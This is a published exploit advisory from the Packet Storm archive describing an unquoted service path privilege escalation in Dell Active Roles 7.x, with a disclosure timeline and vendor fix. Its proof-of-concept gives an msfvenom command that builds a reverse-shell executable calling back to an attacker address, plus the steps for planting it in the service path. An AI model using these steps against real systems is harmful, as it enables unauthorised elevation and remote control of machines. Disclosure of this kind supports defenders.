exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dell Active Roles 7.x Unquoted Service Path Privilege Escalation

Dell Active Roles 7.x Unquoted Service Path Privilege Escalation
Posted Nov 17, 2017
Authored by SlidingWindow

Dell Active Roles versions 7.1, 7.0.4, 7.0.3, 7.0.2, and 7.0 suffer from an unquoted service path privilege escalation vulnerability.

tags | exploit
SHA-256 | 07a00566104c4227a3ed1dab9176a2272fdf66ccdbc0cd002a9eab7ce0cd87a2

Dell Active Roles 7.x Unquoted Service Path Privilege Escalation

Change Mirror Download
# Exploit Title: [Dell Active Roles Unquoted Service Path Privilege Escalation]
# Date: [16/06/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [https://www.oneidentity.com/products/active-roles/]
# Version: [Dell Active Roles versions 7.1, 7.0.4, 7.0.3, 7.0.2, and 7.0 ]
# Tested on: [Dell ActiveRoles version 7.1.2.3406]
# CVE : [GENERIC-MAP-NO-MATCH]

==================
#Product:-
==================
Dell Active Roles (now Quest Active Roles) Server gives Active Directory administrators all the tools necessary to securely and efficiently manage Active Directory, overcoming the native shortcomings of AD and automates the most common AD administration tasks.

==================
#Vulnerability:-
==================
Dell Active Roles Unquoted Service Path Privilege Escalation

========================
#Vulnerability Details:-
========================

=============================================================================================================================
Dell Active Roles Unquoted Service Path Privilege Escalation
=============================================================================================================================
Dell Active Roles installs two services on the system, 'Active Roles Administration Service' and 'Active Roles Synchronization Service'. Both the services use a search path that contains an unquoted element, in which the element contains white space or other separators.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.


#Proof-of-Concept:-
-------------------

1. Create an executable file using MSFVenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.100.6 LPORT=443 -f exe > Active.exe

2. Log into the target with a low privileged account which has write access to the file system ( or has misconfigured ACL).
3. Copy this file to 'C:\Program Files\Dell\' on the target machine.
4. Wait for System reboot or admin to restart Active Roles Synchronization Service.
5. The target machine sends reverse shell after the reboot or when service is restarted.



A successful attempt would require the local attacker must insert an executable file in the path of the service.It could be C:\Program.exe or C:\Program Files\Dell\Active.exe\ for that matter. Upon service restart or system reboot, the malicious code will be run with elevated privileges.

===================================
#Vulnerability Disclosure Timeline:
===================================

16/06/2017: First email to disclose vulnerability to D-Link incident response team.
19/06/2017: Vendor acknowledged the report.
1/09/2017: Vendor published a KB article for workaround: https://support.oneidentity.com/kb/232543
30/10/2017: Vendor released a fix version 7.2: https://support.oneidentity.com/active-roles/7.2/download-new-releases




Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close